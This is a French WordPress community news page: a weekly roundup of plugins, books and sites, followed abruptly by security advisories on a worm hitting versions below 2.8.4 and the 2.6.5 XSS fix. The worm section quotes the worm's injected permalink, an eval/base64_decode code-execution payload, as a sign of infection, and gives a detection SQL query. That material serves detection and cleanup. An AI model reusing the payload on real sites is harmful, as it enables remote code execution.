15 façons d’intégrer Facebook dans son site web WordPress… mais pas que !

Justin Stravarius de chez AppStorm nous propose 15 façons d’intégrer Facebook dans son site web… que ce soit WordPress, mais aussi chez la « concurrence ». On n’est pas sectaire chez WordPress Francophone.

Un design original

Des sites sous WordPress peuvent parfois apporter des surprises. C’est le cas avec celui-ci. Son design est tout simplement unique et étonnant. Merci @Fran6 pour le lien.

WordPress 1.4.3 pour BlackBerry

Comme chaque semaine, la version mobile en évolution est celle prévue pour les BlackBerry qui passe en 1.4.3.

WordPress ouvert qu’à des membres désignés

C’est ce que propose l’extension WordPress Membership Lite. Votre site devient alors accessible qu’aux seuls membres choisis et triés sur le volet. Ça fait classe non ? Merci @br1o.

Des effets sur les images

Voici une astuce de WPMU.org pour décorer vos images de manières plus originales que ce qui est prévu.

Protéger son dossier ../wp-admin/

Si vous vous êtes déjà posé la question de savoir comment protéger son dossier ../wp-admin/ voici la solution.

Les clés de sécurité de WordPress

Depuis quelques temps maintenant, lors de l’installation de WordPress, on vous demande d’enregistrer des clés de sécurité dans le fichier wp-config.php, d’ailleurs, avec la version 3.0, leur nombre a encore augmenté. Mais savez-vous à quoi elles servent ? Voici le détail.

Google Scribe et WordPress

Cette semaine, outre l’arrivée de Google Instant, la firme de Mountain View a dévoilé son projet Scribe. Ce dernier permet une auto-complétion des mots d’une phrase au fur et à mesure de la frappe. Le même principe que Instant mais appliqué au texte au lieu de la recherche. C’est un peu le mode T9 des mobiles pour l’internet et la saisie informatique. Sudar de Night Dreaming a réussi adaptation de cette fonction pour les commentaires de WordPress. Il a réalisé une extension qui permet d’activer ce mode pour la rédaction des commentaires sur votre site.

La ville de Rive de Gier (42) passe sous WordPress

Saluons cette collectivité locale qui a fait le choix (et le bon) de migrer son site web officiel sous WordPress. De plus en plus de municipalités se tournent vers cette solution avec raison pour sa souplesse, sa facilité d’utilisation et sa gestion simplifiée. Bien leur en prend ! Un site qui aura sa place au sein de notre Vitrine dans peu de temps. Un exemple à suivre sans nul doute.

Le Campus WordPress 3 de chez Pearson, c’est pour bientôt…

Vous avez été nombreux à avoir craqué pour le livre de nos 3 comparses de WordPress Francophone, Xavier, Francis et Amaury : Le Campus WordPress 2.7 aux éditions Pearson. Le 24 septembre, ils remettent ça avec la mise à jour complète du bouquin pour parler de la version 3.0. C’est Xavier qui l’a twitté le 1er ! Le livre est d’ores et déjà commandable chez Amazon.
Je rappelle que WordPress Francophone ne touche pas de royalties sur les ventes de ce livre. Seuls sont concernés à titre individuel les 3 auteurs.

… et d’autres suivent le pas

Comme je le disais au début de cet hebdo, nous ne sommes pas sectaires chez WPFR. Voici donc d’autres publications à paraitre sur WordPress 3.0 :

1. Site Web avec WordPress 3.0 : 100 % pratique chez Dunod
2. WordPress 3 pour le blogueur efficace chez Eyrolles

Une galaxie pas si lointaine

Geekeries vient de sortir sa galaxie WordPress en français... avec le Planet de WordPress Francophone, il y a donc de quoi avoir la tête dans les étoiles en pensant à WordPress…

Le premier problème est une vulnérabilité dans la fonction « Press-Minute », elle a été découverte par Benjamin Flesch. Tandis que le second problème, découvert par Dawid Golunski, est une faille avec le formatage des noms de fichiers pouvant être exploité avec certaines configurations Apache. Merci à eux 2 pour la découverte et le report des cas…

La version française est d’or et déjà disponible, ainsi que l’archive ZIP contenant uniquement les fichiers modifiés est en version francisé. (Cela vous évitera le message de mise à jour…)

Les anciennes versions de WordPress ( inférieur à la 2.8.4 ) sont susceptibles d’être contaminées par un vers (de type worm). Henri du blog 2803, décrit son fonctionnement : « il simule l’enregistrement d’un nouvel utilisateur, utilise une faille de sécurité connue, puis se cache avec l’aide d’un javascript et enfin intègre du spam et du code malicieux au sein de vos articles. »

Si votre blog est à jour, en version 2.8.4, vous n’avez rien à craindre, cette version est immunisée… Pour les autres, vous devez absolument mettre à jour votre installation.

Pour mettre à jour.

La méthode est toujours la même :

1. Sauvegarder les fichiers via votre client FTP
2. Sauvegarder votre base de données via phpMyAdmin
3. Désactiver toutes les extensions
4. Mettre à jour WordPress (via FTP ou mise à jour automatique)
5. Réactiver les extensions.

Comment savoir si son blog est contaminé ?

3 choses à vérifier…

Les permaliens :

example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/.

Si vos permaliens contiennent le mot « eval » ou « base64_decode », vous êtes contaminé.

Les utilisateurs :

Vérifier la liste de vos utilisateurs, si vous êtes le seul administrateur, vous devriez n’avoir qu’un seul compte. Si les inscriptions sont ouvertes, vérifier qu’il n’y a pas un compte nommé « Administrator »

Essayer également la requête SQL proposée par Dougal sur son blog. ( dougal.gunters.org )

Pour tester votre base d’articles, exécuter la requête suivante sur votre installation :

SELECT * FROM wp_posts WHERE post_content LIKE '%<iframe%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '%<noscript%'
UNION
SELECT * FROM wp_posts WHERE post_content LIKE '%display:%'

Si cette requête SQL renvoie des résultats, vous devez nettoyer chacun des articles contaminés…

Quelques ressources

• Les 10 étapes pour protéger votre console d’administration, par Smashing Magazine
• Comment nettoyer complètement une installation WordPress contaminée
• Un résumé de la situation et des solutions existantes par Lorelle

Le codex traite également du sujet avec la page « Comment nettoyer mon installation après un hacking« .

Le correctif concerne une faille de sécurité au niveau du XSS, découverte par Jeremiah Reith. Cette faille concerne seulement les serveurs virtuels IP basés sur Apache 2.x. Ainsi, si seules les corrections vous intéressent, il suffit d’extraire les 2 fichiers suivants wp-includes/feed.php et wp-includes/version.php du pack de la version 2.6.5… ou de télécharger ce pack tout prêt comprenant les fichiers modifiés.

Cette version 2.6.5 contient 3 autres petites corrections de bugs en plus de la faille ci-dessus. Le premier empêchait accidentellement la sauvegarde des informations meta d’un article dans la révision. Le deuxième empêchait XML-RPC de rapporter les types de contenus incorrects. Le troisième ajout est le formatage des ID utilisateurs lors d’une requêtes d’effacements multiples (comme supprimer plusieurs articles d’un coup par exemple).

Il est à noter que la version 2.6.4 est volontairement sautée. On passe directement de la 2.6.3 à la 2.6.5 afin d’éviter toute confusion avec la fausse version 2.6.4 qui a circulé un temps. Il n’y a pas et n’y aura jamais de WordPress 2.6.4 !

• Télécharger WordPress 2.6.5. (version française)
• Télécharger le pack des fichiers modifiés